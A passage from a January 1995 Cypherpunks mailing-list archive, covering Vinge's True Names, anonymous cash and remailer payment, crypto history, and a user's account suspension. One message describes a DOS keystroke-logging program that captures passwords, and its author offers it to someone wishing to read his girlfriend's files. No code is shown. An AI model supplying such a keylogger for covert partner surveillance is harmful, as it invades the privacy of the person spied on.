What goes across .gov and .mil computers is one thing, however what comes across sprintlink's computers to my service provider to my computer is up to sprintlink, Intnet.net and myself. I don't care to read racist comments, so I don't view them. If I want to download nudie gifs, it's my business, and right as stated under the First Amendment. From hfinney at shell.portal.com Thu Jan 5 15:11:42 1995 From: hfinney at shell.portal.com (Hal) Date: Thu, 5 Jan 95 15:11:42 PST Subject: Vinge reference in Moving Mars Message-ID: <199501052312.PAA26449@jobe.shell.portal.com> Greg Bear's novel Moving Mars, now out in paperback, has a cute reference to Vernor Vinge's ideas from True Names. p.208: "'Don't stick on the names,' Orianna said, shaping the living room into more Regency. 'All my friends are into Vernoring. They work and play with fake names. I don't know their true ones. Not even their parents know.' "'Why?' "'It's a game. Two rules - nobody knows what you're doing, and you do nothing illegal.' "'Doesn't that take the fun out of doin crypto?' I asked. "'Wow - crypto! Hide in the tomb. Sorry. I shy from two-edged words. We call it Vernoring.' "'Doesn't it?' I persisted. "'No,' Oriana said thoughtfully. 'Illegal is harm. Harm is stupid. Stupid is its own game, and none of my friends play it. Here's Kite.'" The book is pretty good, lots of nano and other hot tech, but not much crypto (sorry, Vernoring)... A little slow in places, though. Hal From lmccarth at ducie.cs.umass.edu Thu Jan 5 15:30:21 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Thu, 5 Jan 95 15:30:21 PST Subject: Anonymity in Donating Message-ID: <199501052335.SAA16921@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Some nice examples of the preservation of anonymity in charitable donations, both for the donor and for the recipient, caught my attention today.
An article by Clare Ulrich in the December 1994 Communique (Vol.18 No.3), published by The Cornell Campaign, pays tribute to an anonymous donor to Cornell U.: "While some acts of generosity are marked by a name on a building or a plaque on a wall, others, so to speak, can be counted among the philanthropic `whodunits.' These are the anonymous gifts, and Communique would like to profile several innovative projects that one anonymous donor helped launch this year. According to the donor, anonymity provides greater freedom to `pick and choose' projects that are personally interesting. This donor is particularly attracted to programs that involve computer technology or promise to generate benefits beyond the scope of the immediate project. [...] The same donor who declined recognition for these high-tech projects also provided support for 24 high school juniors from Boys Harbor in Harlem to attend the six-week Cornell Summer College Program in 1994, as well as the two previous summers. [...] Although this anonymous donor may not be interested in getting a name on something, he certainly leaves an indelible mark on the quality of education at Cornell." Closer to home, our dept. chair Dave Stemple broadcast a request for donations to an anonymous recipient: "One of our undergrad majors lived in Amherst Crossings, which burned down last week. As a result this student, a senior who had planned to graduate this spring, is destitute and needs help or he will be unable to complete his degree. If you would like, you can contribute clothes or money (cash only please in order to maintain the student's anonymity) to him. [...]" Incidentally, I received my B&W C'punks shirt from Kevin Prigge a few weeks ago, and consider myself a very satisfied customer. I made a point of wearing it on the flights both ways for a recent vacation I took in California. On the return trip, I was delayed at O'Hare for over an hour due to a leaky window on the airplane. 
A man in his 50s or 60s approached me and asked, with a smirk, what a Cypherpunk was. I explained a bit, mentioning the passage of the DT bill. Noting the mention of the NSA on the shirt, the man mentioned that his son is working at Apple "with the NSA".... -L. Futplex McCarthy; PGP key by finger or server "The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLwyA6mf7YYibNzjpAQFENAQA09JTWr501ZJliFWK4efY8py2OhgBq8gy rqYvrGX+EZ49Uq+IDU2DjiiPBHuYPOE23wb/QfouhmKaSSUMqifYTd+uau247Cot CC+CYceBvH3oK35oTr7CahSqb4JLUNs4atOkoYtpbYPG5qrR8yJkAGBKbVzQZHKt ioUFB5xhYKA= =QD4b - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLwyB+CoZzwIn1bdtAQEgkAF+OBkRShMO+Et/Kr8AkPXPz564xgNnhzfP WPSO0W0UCpkg/e7bQIliMCXiyzp7nHQr =1IBd -----END PGP SIGNATURE----- From chen at intuit.com Thu Jan 5 15:31:01 1995 From: chen at intuit.com (Mark Chen) Date: Thu, 5 Jan 95 15:31:01 PST Subject: RSADSI Conference - Extra Passes? Message-ID: <9501052330.AA15736@doom.intuit.com> A cohort of mine is in need of a pass to next week's RSADSI conference, which, unfortunately, is sold out. So if anyone has a pass that they're not planning to use for a half-day or so, please drop me an e-mail and I will be in your debt. Thanks! 
-- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From blane at seanet.com Thu Jan 5 16:01:25 1995 From: blane at seanet.com (Brian Lane) Date: Thu, 5 Jan 95 16:01:25 PST Subject: True Names In-Reply-To: Message-ID: On Thu, 5 Jan 1995, Angus Patterson wrote: > I've been trying to get True Names by Vernor Vinge, and have been told it's > out of print (like most good cypunk ), does anybody have it scanned? > I realize this is without permission, so does anybody have Vinge's address? > (e-mail or otherwise) or could anybody ask him? Btw, does he have any other > crypto/anonymity related stories? Thanks in advance. Go to your local library and request it. Here in the states they will search all over for you. I had a paperback copy in about 3 weeks. Excellent book I might add. Brian ------------------------------------------------------------------------------ "Everyone is a prisoner holding their own key." | finger blane at seanet.com -- Journey | PGP 2.6 email accepted ------------------------------------------------------------------------------ From ddt at lsd.com Thu Jan 5 16:13:34 1995 From: ddt at lsd.com (Dave Del Torto) Date: Thu, 5 Jan 95 16:13:34 PST Subject: C-LIT: Vernor Vinge's "A Fire Upon the Deep" (was: Re: True Names) Message-ID: At 1:48 pm 1/5/95, Angus Patterson wrote: >I've been trying to get True Names by Vernor Vinge, and have been told it's >out of print (like most good cypunk ), does anybody have it scanned? >I realize this is without permission, so does anybody have Vinge's address? >(e-mail or otherwise) or could anybody ask him? Btw, does he have any other >crypto/anonymity related stories? Thanks in advance.
Amazing that you should mention this, Angus: I *just* finished reading "A Fire Upon the Deep" and it is not only exceedingly gnarly, but also features a universal net, galactic-wide relays and Netscum-like service providers and associated user kvetching, a sinister-billions-of-years-old-AI-virus, newsgroups, lists populated by aliens - and even _crypto_ as the key to the whole shebang. There's also a great futuristic "dig" on pub key encryption buried in it. Neural net stuff. A possible explanation for the existence of both God and Newt Gingrich...and I could go on. Great read, true anus-clenching adventure... and this from one who does NOT normally read anything more sci-fi than certain software manuals. :) Strongly recommended for c-punks who can last 600 pages (after the first ten, you're hopelessly hooked if you have half a brain left after reading this list for a year or two). I _WISH_ I had VV's email address! I'd like to send the guy a big thank-you and ask if he's writing a sequel (yet). If anyone does know it, puh-LEEze mail me. First book of his I've read, first of its kind I've enjoyed in a very long time. I'll scan my favorite crypto-related (legal-length) excerpt and post it next week, howzat? dave _________________________ Big books small Books high books tall Just give me a good Little book, That's all. -Truman Capote (age 11) C-LIT = Cypherpunk LITerature. Gitcher mind outta the gutter there, Lancelot. From wcs at anchor.ho.att.com Thu Jan 5 16:27:02 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Thu, 5 Jan 95 16:27:02 PST Subject: ecash trial issues explained Message-ID: <9501060025.AA06458@anchor.ho.att.com> > From: Wolfgang Roeckelein > > >-> Digital cash should not be "anonymous" -- paper currency isn't. Serial > > There seems to be a misconception here what is meant with anonymous. Paper cash > is anonymous: I can't derive the person I got the note from from the note > itself.
So if I meet a guy in the street, he gives me a pack of cigarettes and > I give him cash, this transaction is anonymous. It isn't difficult to make paper cash less anonymous, though, by tracking serial numbers. This is occasionally done in "law enforcement" situations - recording the notes used to pay ransom or bribes. It wouldn't be difficult to add serial-number recording equipment/mechanisms to automatic bank-teller machines, to record what serial numbers would be given out to whom. (This can be done either by adding scanners to the ATMs themselves, or by scanning the money before putting it into the ATM, and having the ATM record that transaction #43 dispensed the 105th-110th bills in the stack. Scanning can either be done by OCRs, or by replacing the human-readable numbers with bar-codes, as some of the paranoids periodically suggest the US Treasury is about to do as part of some heinous plan. However, the original posters' assertion that digital cash should not be anonymous is not a technical statement, it's a value judgement, and in my opinion it's a bad one. There are a lot of genuine social needs that anonymity can support, and a lot of bad things that can be done with traceable money. Aside from that, traceability costs money. Original gold and silver money didn't need to be traceable, though coiner's and assayer's marks were useful, and it is easier to keep track of your pile of gold bars if they're numbered. But paper money has serial numbers largely to prevent easy copying; gold is a lot harder to counterfeit, unless you've got a king who insists that coins with his face on them should be worth N times as much as anonymous coins. Bill From nelson at crynwr.com Thu Jan 5 16:27:39 1995 From: nelson at crynwr.com (Russell Nelson) Date: Thu, 5 Jan 95 16:27:39 PST Subject: Remailer postage In-Reply-To: <199501052148.NAA07203@netcom5.netcom.com> Message-ID: From: tcmay at netcom.com (Timothy C. 
May) Date: Thu, 5 Jan 1995 13:48:34 -0800 (PST) (I understand that Russ Nelson has experience in the shareware business, so he may know how many people send in their voluntary contributions. My understanding is that it's a tiny fraction, and that few shareware authors ever make much money. I've talked to some of them, and they consider shareware a failed experiment, except for new products trying to break into crowded markets, where the "shareware" label is just a facade for essentially giving it away in exchange for fame and eventual fortune if the product goes commercial.) Shareware is essentially begging, yes. Far better to just give the software away to create a need for your services. Then people are actually getting something for their money. Selling services is profitable, particularly if you can sell the same service to multiple people at the same time. If you're very good at selling, you can even sell a service as an insurance plan. -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From rah at shipwright.com Thu Jan 5 16:32:59 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 5 Jan 95 16:32:59 PST Subject: GIF_nip Message-ID: > Watch your Cc: headers, s'vous plait? AAK! Eudora's "reply-to-all" strikes again! Grovelling in your general direction, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." 
-- Bertrand Russell (617) 323-7923 From blancw at microsoft.com Thu Jan 5 16:47:41 1995 From: blancw at microsoft.com (Blanc Weber) Date: Thu, 5 Jan 95 16:47:41 PST Subject: True Names Message-ID: <9501060048.AA11061@netmail2.microsoft.com> From: Timothy C. May I see copies in used bookstores often. It's in the collection "True Names and Something-or-other" and was in print until recently. I also have the Bluejay edition, with an afterword by Marvin Minsky. .............................................................. I bought one at Half-Price Books. I don't know what edition it is, it's a dingy little paperback with a signature in it of some stranger that I wouldn't know. I keep it with my "previously owned" collection. Blanc From entropy at IntNet.net Thu Jan 5 16:58:57 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Thu, 5 Jan 95 16:58:57 PST Subject: Remailer Abuse In-Reply-To: <9501050453.AA10198@tadpole.tadpole.com> Message-ID: > Anonymous remailers pretty much require anonymous digital cash, > although this could be built on top of some other electronic > payment system with somewhat less payment lag and reversibility > than FV. Perhaps if the people at DigiCash had seen fit to give me the beta client and server software I could attempt to implement such a beast. Unfortunately, I don't meet their criteria. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From entropy at IntNet.net Thu Jan 5 17:02:26 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Thu, 5 Jan 95 17:02:26 PST Subject: your mail In-Reply-To: Message-ID: > >* Hackers have successfully compromised 350 DoD computer systems If the DoD includes the various branches of service {Army, Navy, etc.} that number is grossly inaccurate. -jon ( --------[ Jonathan D.
Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From jim at acm.org Thu Jan 5 17:07:10 1995 From: jim at acm.org (Jim Gillogly) Date: Thu, 5 Jan 95 17:07:10 PST Subject: True Names In-Reply-To: <9501060048.AA11061@netmail2.microsoft.com> Message-ID: <199501060107.RAA18958@mycroft.rand.org> > Blanc Weber writes: > I see copies in used bookstores often. It's in the collection "True > Names and Something-or-other" and was in print until recently. I also "True Names and Other Dangers" -- I think it's a Baen edition. > have the Bluejay edition, with an afterword by Marvin Minsky. Me too, and I also have the first published version, which is in "Binary Star #5" with "Nightflyers" by George R. R. Martin. Great book -- I want to be a cybergod when I grow up. Jim Gillogly 15 Afteryule S.R. 1995, 01:06 From grendel at netaxs.com Thu Jan 5 17:22:42 1995 From: grendel at netaxs.com (Michael Handler) Date: Thu, 5 Jan 95 17:22:42 PST Subject: True Names In-Reply-To: <9501060048.AA11061@netmail2.microsoft.com> Message-ID: Timothy C. May writes: > I see copies in used bookstores often. It's in the collection "True > Names and Something-or-other" and was in print until recently. "True Names and Other Dangers", if anyone's trying to mail order it. --Mike, still looking for a copy himself From sinclai at ecf.toronto.edu Thu Jan 5 17:40:39 1995 From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N) Date: Thu, 5 Jan 95 17:40:39 PST Subject: DES for HP48 Message-ID: <95Jan5.204113edt.4634@cannon.ecf.toronto.edu> There used to be some code on soda to do DES on an HP48 palmtop/calculator. I looked this afternoon, on ftp.csua.berkeley.edu, and I couldn't find it. Anyone know where it got to?
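An added example, not part of any message in this archive: the one-shot token billing that Bill Stewart's "Remailer Abuse" post above describes (operator-minted tokens, user-supplied tokens, and the blind-signature improvement), sketched in Python. All class and function names are hypothetical, the RSA key is a toy constructed for illustration, and the blinding shown is textbook RSA blinding, which the post mentions but does not specify.

```python
import hashlib
import secrets
from math import gcd

class TokenLedger:
    """Database of valid one-shot tokens; a token is deleted on first use."""

    def __init__(self):
        # Only digests are stored, so a copy of the database is not spendable.
        self._valid = set()

    @staticmethod
    def _digest(token):
        return hashlib.sha256(token.encode("utf-8")).digest()

    def sell(self, count):
        """Operator mints tokens; they go back to the buyer in an encrypted reply."""
        tokens = [secrets.token_hex(16) for _ in range(count)]
        self.deposit(tokens)
        return tokens

    def deposit(self, tokens):
        """Buyer picked the tokens and sent them with the purchase; no reply needed."""
        for t in tokens:
            if len(t) < 32:
                raise ValueError("token too short to be unguessable")
        self._valid.update(self._digest(t) for t in tokens)

    def redeem(self, token):
        """Accept a token exactly once."""
        d = self._digest(token)
        if d not in self._valid:
            return False
        self._valid.discard(d)
        return True

# In both variants above the operator sees each token at purchase time and
# could link purchase to use by keeping records. Blind signatures remove
# that ability: the operator signs a value it cannot read.

# Toy RSA key, constructed for this example (far too small for real use).
P, Q = 2**61 - 1, 2**89 - 1            # two Mersenne primes
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))      # operator's private exponent

def token_hash(token):
    h = hashlib.sha256(token.encode("utf-8")).digest()
    return int.from_bytes(h, "big") % N

def blind(token):
    """Buyer side: hide the token hash behind a random factor r."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            break
    return (token_hash(token) * pow(r, E, N)) % N, r

def sign_blinded(blinded):
    """Operator side, at purchase time: sign without learning the token."""
    return pow(blinded, D, N)

def unblind(blind_sig, r):
    """Buyer side: strip r, leaving a valid signature on the token hash."""
    return (blind_sig * pow(r, -1, N)) % N

class BlindTokenRemailer:
    """With blind tokens the database flips: it records spent tokens."""

    def __init__(self):
        self._spent = set()

    def redeem(self, token, sig):
        h = token_hash(token)
        if pow(sig, E, N) != h or h in self._spent:
            return False
        self._spent.add(h)
        return True

if __name__ == "__main__":
    ledger = TokenLedger()
    first = ledger.sell(3)[0]
    print(ledger.redeem(first), ledger.redeem(first))

    token = secrets.token_hex(16)
    blinded, r = blind(token)
    sig = unblind(sign_blinded(blinded), r)
    remailer = BlindTokenRemailer()
    print(remailer.redeem(token, sig), remailer.redeem(token, sig))
```
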
From blancw at microsoft.com Thu Jan 5 17:50:45 1995 From: blancw at microsoft.com (Blanc Weber) Date: Thu, 5 Jan 95 17:50:45 PST Subject: True Names Message-ID: <9501060151.AA16068@netmail2.microsoft.com> From: Jim Gillogly > Blanc Weber writes: > I see copies in used bookstores often. It's in the collection "True > Names and Something-or-other" and was in print until recently. I also ............................................................. No, No, Jim, that wasn't me saying that - that statement was made by a cpunkgod. Mine was beneath it. Blanc From rah at shipwright.com Thu Jan 5 18:01:33 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 5 Jan 95 18:01:33 PST Subject: floating point crypto? Message-ID: I'm incensed. I casually mentioned somewhere else that I saw something on this list about floating-point math being used in crypto, contrary to popular belief, and somebody had the *temerity* to call me on it. ;-). I think it had to do with factoring, but maybe even in key-generation, though that doesn't sound right at all... So, are there c-punk archives I could look in? I remember hearing something about that, too. However, if someone remembers off the top of their head, or if they have an actual copy of the posting, that would be great, too. Please send me whatever it is by e-mail. No point cluttering the list more than I already have... Of all the nerve.... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From tcmay at netcom.com Thu Jan 5 18:56:29 1995 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 5 Jan 95 18:56:29 PST Subject: floating point crypto? In-Reply-To: Message-ID: <199501060251.SAA26936@netcom13.netcom.com> Robert H.
has asked that we reply in e-mail to him, to avoid "cluttering the list more than I already have...," but the logic of this is faulty. The few lines of a response such as this one, or even of several such responses, are as nothing compared to dozens or more people sifting their own archives so they can each independently send Robert what they find. Hence my public reply. Robert Hettinga wrote: > I casually mentioned somewhere else that I saw something on this list about > floating-point math being used in crypto, contrary to popular belief, and > somebody had the *temerity* to call me on it. ;-). > > I think it had to do with factoring, but maybe even in key-generation, > though that doesn't sound right at all... The thread was "Pentium bug and CRYPTO," and it hit on 1994-11-21 and lasted a few days. Posts by Derek Atkins, Mike Duvos, and others stated persuasively that no floating point operations are included in PGP, that no FP coprocessor is needed or used for PGP, and that the Pentium bug could not affect PGP. (In another thread, which I have no intention of trying to dig up now, though I recall either Norm Hardy or Hal Finney was one of those to comment, it was noted that some clever uses of floating point hardware can help with ostensibly integer-only computations. But PGP, as noted above, does not do this, and I expect this trick is not common.) > So, are there c-punk archives I could look in? I remember hearing something > about that, too. > > However, if someone remembers off the top of their head, or if they have an > actual copy of the posting, that would be great, too. > > Please send me whatever it is by e-mail. No point cluttering the list more > than I already have... (I will send Robert several of these articles, so others don't have to. Game theory and all that good stuff.) > > Of all the nerve....
Not to sound strident, but if folks would keep copies of articles and spend some time organizing them in data bases or in other searchable forms, this would help the list. In my opinion, having personal access to past posts is several orders of magnitude more important than having MIDI-MIME JPEG-II TeX players that can display "Cypherpunks R Us" in the correct font and with the "R" reversed according to spec. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From eric at remailer.net Thu Jan 5 20:43:54 1995 From: eric at remailer.net (Eric Hughes) Date: Thu, 5 Jan 95 20:43:54 PST Subject: DES for HP48 In-Reply-To: <95Jan5.204113edt.4634@cannon.ecf.toronto.edu> Message-ID: <199501060443.UAA19367@largo.remailer.net> From: SINCLAIR DOUGLAS N There used to be some code on soda to do DES on an HP48 palmtop/calculator. ftp://ftp.csua.berkeley.edu/pub/cypherpunks/applications/misc/des.hp48sx.gz Eric From carolann at vortex.mm.com Thu Jan 5 19:57:05 1995 From: carolann at vortex.mm.com (Carol Anne Braddock) Date: Thu, 5 Jan 1995 21:57:05 -0600 Subject: No Subject Message-ID: <82e47b32bd189967ee9a205e1d1602de@NO-ID-FOUND.mhonarc.org> [icicle.winternet.com] Login name: carolann In real life: CarolAnne Braddock Directory: /usr2/carolann Shell: /etc/scripts/tcsh-susp Last login Thu Jan 5 21:38 on ttyq5 from annex3-1.wintern New mail received Thu Jan 5 21:16:23 1995; unread since Mon Jan 2 13:18:25 1995 Plan: This account has been disabled permanently. 
Mike Horwath - Admin - Winternet - drechsau at winternet.com From harmon at tenet.edu Thu Jan 5 22:54:18 1995 From: harmon at tenet.edu (Dan Harmon) Date: Thu, 5 Jan 95 22:54:18 PST Subject: Book review: Codebreakers, the Inside Story of Bletchley Park In-Reply-To: <199501040551.VAA12193@netcom13.netcom.com> Message-ID: Another book that has not been mentioned is "Alan Turing the Enigma" by Andrew Hodges. It gives, what I think, is a good analysis of Turing's work, a lot of which is still classified, what role Hut 6 played (theater traffic analysis, bombe development, and other projects after Hut 6) , and his subsequent role in the development of computing. Hodges does a good job of putting Turing in historical and mathematical/cryptological perspective. Alas, like some of the books that are suggested, it is recently out of print ( look for it in the remainder/used book stores). Dan From m00012 at KANGA.STCLOUD.MSUS.EDU Thu Jan 5 22:58:49 1995 From: m00012 at KANGA.STCLOUD.MSUS.EDU (m00012 at KANGA.STCLOUD.MSUS.EDU) Date: Thu, 5 Jan 95 22:58:49 PST Subject: sniff passwords on PC (DOS) Message-ID: <0098A089.4C425900.550@KANGA.STCLOUD.MSUS.EDU> As a demonstration of concept, I wrote a small, simple program that replaces the keyboard interrupt and stores all keystrokes in a buffer. It was very very easy to write. It works while using pgp and windows\net. It does not work after starting windows. Not sure, but it seems obvious that MS windows installs its own keyboard interrupt. I suppose it would be easy to enhance this simple program (I bet it's been done by others) to store passwords into a secret file on a hard drive unbeknownst to the user. I first suspected that such a program already existed after hearing, two days after his arrest, that the CIA had cracked Aldrich Aim's encrypted files. (sorry if I spelled his name incorrectly.) Think about it, the govt. could spend 50,000 to 100,000 to create a freeware gif viewer, for example, that installed such a tsr. Mike P.S.
If the guy who wanted to see his gf's files writes me, I'll send you this keyboard sniffer program. From harmon at tenet.edu Thu Jan 5 23:11:22 1995 From: harmon at tenet.edu (Dan Harmon) Date: Thu, 5 Jan 95 23:11:22 PST Subject: Siegel and Lewis In-Reply-To: <9501041424.AA25564@tadpole.tadpole.com> Message-ID: On Wed, 4 Jan 1995, Doug Barnes wrote: > > Why is it that so many cypherpunks like the economist? > > I learned recently that Eric is a big fan. So am I. You're certainly > not the first other cypherpunk to mention this. Weird. I mean, it's > not exactly a radical publication... it just gets its *&#$*#$ facts > right. Probably this is it. > > Doug > The reason is, and I do not presume to speak for other individuals on this list, the Economist looks at the world from an independent (i.e. not owned by one of the major publishing houses, if I'm not mistaken) point of view, and is not afraid to pursue different analysis of a topic. I will also venture that the closest that we have in the US is Forbes. Dan From carolann at mm.com Thu Jan 5 23:55:22 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Thu, 5 Jan 95 23:55:22 PST Subject: All I did was properly crosspost! Message-ID: I first saw the Dubois Letter in alt.security.pgp the 28th. PRZ posted it here the next day. I "crossposted" it to my favorite 10 newsgroups. Just 10. Some creep complained. (we'll get to him a bit later). I didn't get a chance to get back on-line for 3 1/2 days. I was lied to. I am hurt. My mail has been stolen. I haven't read any of you for four days now. My web pages are vulnerable. Is there somebody who can please help me get my 2 megs of mail? I can't get at your keys. http://www.winternet.com/~carolann/coffee.html has the cypherpunk rant links on the page. I'm proud of them, and proud to be on this list. But to take my account away for crossposting to 10 groups is not right. I'll be back with a better chronology. 
Love Always, Carol Anne ps Hope you like (and feel free to use) my new .sig From carolann at mm.com Thu Jan 5 23:59:42 1995 From: carolann at mm.com (Carol Anne Braddock) Date: Thu, 5 Jan 95 23:59:42 PST Subject: Siegel and Lewis In-Reply-To: Message-ID: Guess I'm worse than Siegel & Lewis now, huh? On Fri, 6 Jan 1995, Dan Harmon wrote: > On Wed, 4 Jan 1995, Doug Barnes wrote: > > Why is it that so many cypherpunks like the economist? > > I learned recently that Eric is a big fan. So am I. You're certainly > > not the first other cypherpunk to mention this. Weird. I mean, it's > > not exactly a radical publication... it just gets its *&#$*#$ facts > > right. Probably this is it. > > Doug > The reason is, and I do not presume to speak for other individuals on > this list, the Economist looks at the world from an independent (i.e. not > owned by one of the major publishing houses, if I'm not mistaken) point > of view, and is not afraid to pursue different analysis of a topic. > > I will also venture that the closest that we have in the US is Forbes. > > Dan > > From lmccarth at ducie.cs.umass.edu Fri Jan 6 00:02:03 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Fri, 6 Jan 95 00:02:03 PST Subject: public vs. private replies Message-ID: <199501060807.DAA22166@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Tim May writes: > [...] has asked that we reply in e-mail to him, to avoid > "cluttering the list more than I already have...," but the logic of > this is faulty. The few lines of a response such as this one, or even > of several such responses, are as nothing compared to dozens or more > people sifting their own archives so they can each independently send > [...] what they find. Hence my public reply. I'd like to amplify this point, which is missed all too often on Usenet and mailing lists. Replies to requests for fairly widely-known factual information should be directed to the forum (i.e. 
the mailing list, newsgroup, or what have you). This practice not only prevents duplication of effort by the repliers, as Tim mentioned, but also prevents duplication of effort by others interested in the same answer. I try to make a point of replying to the whole list when someone asks for a list of remailers, mail-news gateways, etc. for precisely this reason. As I see it the basic principle rests on a simple comparison of the number of replies desired with the likely number of replies. If you anticipate getting many more replies than you want, you should ask for replies to the entire forum in which you place the query. Otherwise, seek private email. This is certainly not a perfect heuristic, but it's an excellent starting point IMHO. For example, a few months back I wanted to give away an old AM/FM/ shortwave radio, so I posted to a local newsgroup. I asked for initial public replies, so that I wouldn't be flooded with mail before I had the chance to announce that a recipient had been selected (first-come first-served). After the initial expression of interest, further correspondence continued in private. [...] > In my opinion, having personal access > to past posts is several orders of magnitude more important than > having MIDI-MIME JPEG-II TeX players [...] It takes more disk space from one's personal quota, though (for those who suffer under such restrictions). :[ Let's not head down this road again.... "You've gotta keep `em separated !" -Offspring -L. Futplex McCarthy; PGP key by finger or server "The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. 
Freeh - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLwz5Mmf7YYibNzjpAQEooAQAlj93pc1CuSMTdApaRTg06ONgPkeyqUfY KhdcqzDmEnuWBDdwgO+YtHOHFsOGlPhoFhOijajJzTh97G1TBYn5plBECaZXs1RJ Au9g1uqEAKtFLFYB/jKDaDA/Xzf13irCKb846IAhttKICwQJ8HfLfgPWLHMa1/f1 ldkXYq7DfY8= =7KNc - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLwz6PCoZzwIn1bdtAQGpbwGAqY6tLm7TAN2TluCpD1WOTsR6kMgI2R27 CMExwcLopwSapiPNO0u/IHnzHUq5ij2C =TyKQ -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Fri Jan 6 00:55:49 1995 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Fri, 6 Jan 95 00:55:49 PST Subject: All I did was properly crosspost! Message-ID: <199501060901.EAA22716@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- [I'm cc:ing this to C. A. Braddock's new address and her ex-sysadmin, in addition to the cypherpunks list. --L. Futplex McCarthy] Carol Anne Braddock writes: > I first saw the Dubois Letter in alt.security.pgp the 28th. > PRZ posted it here the next day. > > I "crossposted" it to my favorite 10 newsgroups. Just 10. Posting letters asking for $$$ is of course a risky venture on Usenet. We see the PRZ Appeal as a Worthy Cause (tm), but that's just what all the MAKE.MONEY.FAST posters think of their garbage too. If you go sticking out your hand, you'd better be doing it in the right place. My frank reaction as a veteran Usenetter is that 10 newsgroups sounds like rather a lot, especially when that presumably excludes the groups like a.s.pgp to which the letter was originally posted. To which 10 newsgroups did you repost the letter ? [...] > Is there somebody who can please help me get my 2 megs of mail? 
I believe it's questionable whether your old system is under any legal obligation to provide access to your accumulated mail there. As I recall, Netcom ended up deleting most of the deluge of mail Canter & Siegel received after their infamous spam. However, in this instance it does seem that it would be polite (and good P.R.) to give you access to the mail your account has received. Apologize and ask your former admin nicely, and you might well get it. He could move it to an anon-ftp directory, perhaps encrypted with some public key of yours :) [...] > But to take my account away for crossposting to 10 groups is not right. Well, it depends greatly upon what you posted and where. If I posted the PRZ Appeal to *my* ten favorite newsgroups (including alt.config, alt.religion. kibology, and alt.sexual.abuse.recovery), I'd certainly expect to face trouble and perhaps lose posting privileges. [...] > Login name: carolann In real life: CarolAnne Braddock > Directory: /usr2/carolann Shell: /etc/scripts/tcsh-susp > Last login Thu Jan 5 21:38 on ttyq5 from annex3-1.wintern > New mail received Thu Jan 5 21:16:23 1995; > unread since Mon Jan 2 13:18:25 1995 > Plan: > This account has been disabled permanently. > > Mike Horwath - Admin - Winternet - drechsau at winternet.com -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLw0Fu2f7YYibNzjpAQGwoAP/RrXUl3vguSSJSvGDNKsXIMek61Ay5Cvy xFO/NWcyZpzXkqwF3w19DOtke1EQ1NuPP7Z9luN6zF/QkqNwS6Z0mAMc8hcI0kLg F3ESx06UABPJMQoVY63BtaDYuj6Dualjs903koAliIUhpITZ+qsf7jaj3qT1FtMa d3SzHqOWGYM= =876P - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and 